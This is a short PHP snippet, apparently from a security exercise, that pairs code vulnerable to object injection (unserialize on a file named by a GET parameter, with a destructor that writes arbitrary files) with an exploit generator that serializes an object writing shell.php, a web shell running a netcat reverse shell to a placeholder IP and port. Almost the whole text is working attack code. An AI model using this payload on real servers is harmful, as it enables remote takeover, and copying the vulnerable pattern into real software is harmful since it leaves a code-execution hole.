class file {
public $file = "dump.txt";
public $data = "dump test";
function __destruct(){
file_put_contents($this->file, $this->data);
}
}
$file_name = $_GET['file'];
unserialize(file_get_contents($file_name));
<?php
class file
{
public $file = 'shell.php';
public $data = '<?php shell_exec("nc -e /bin/bash IP PORT"); ?>';
}
echo (serialize(new file));
?>